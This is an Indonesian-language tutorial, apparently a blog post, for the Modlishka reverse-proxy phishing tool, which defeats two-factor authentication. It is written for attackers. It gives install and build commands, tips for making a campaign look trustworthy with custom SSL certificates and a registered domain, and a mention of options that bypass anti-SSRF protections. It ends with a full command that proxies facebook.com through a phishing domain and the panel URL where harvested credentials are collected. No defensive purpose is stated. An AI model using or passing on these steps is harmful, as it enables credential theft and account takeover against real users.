Modlishka - Membuat Phishing Dengan Otentikasi 2FA



Modlishka adalah proxy phishing berbasis go yang membawa kampanye phishing Anda ke level selanjutnya. Fitur utama yang membuatnya berbeda dari alat phishing lainnya, adalah ia mendukung otentikasi 2FA. Sangat mudah untuk mengkonfigurasi dengan fleksibilitas tinggi yang memungkinkan penyerang untuk mengontrol semua lalu lintas dari browser target.

Menginstal Modlishka


Untuk menginstal Modlishka, unduh repo dari github dengan 'go get'eperti yang ditunjukkan di bawah ini


  • go get -u
  • https://github.com/drk1wi/Modlishka
Setelah itu masuk ke dalam folder ‘go’ dan jalankan file make tergantung pada OS Anda.


  • cd
  • $GOPATH/go/src/github.com/drk1wi/Modlishka/
  • make

Cara Menjalanin Modlishka

Untuk menjalankan proxy, buka folder ‘dist’ dan jalankan script


  • cd dist\
  • ./proxy -h


Kami melihat banyak opsi berbeda. Anda dapat membuat sertifikasi SSL Anda sendiri menggunakan ‘openssl‘ untuk membuat kampanye phishing lebih dapat dipercaya. Juga pertimbangkan untuk mendaftarkan nama domain. Ada juga opsi untuk melewati beberapa langkah keamanan seperti anti-SSRF. Dalam contoh kita, kita akan membuatnya tetap sederhana dan menjalankannya terhadap domain facebook.


Cukup jalankan perintah di bawah ini terhadap target situs untuk melihat proksi beraksi. Opsi phisingDomain perlu diubah agar sesuai dengan kebutuhan Anda. Jika Anda ingin menggunakan ‘loopback.modlishka.io‘ seperti yang ditunjukkan di bawah ini Anda harus mengubah file ‘index.html‘ di dalam folder apache Anda (/ var / www /) agar sesuai dengan template yang Anda butuhkan.

  • ./proxy -target https://facebook.com -phishingDomain loopback.modlishka.io -listeningPort 80


Setelah itu Anda harus masuk ke panel kontrol untuk melihat semua kredensial yang Anda dapatkan. Ketikkan ini di browser Anda.


http://loopback.modlishka.io/SayHello2Modlishka/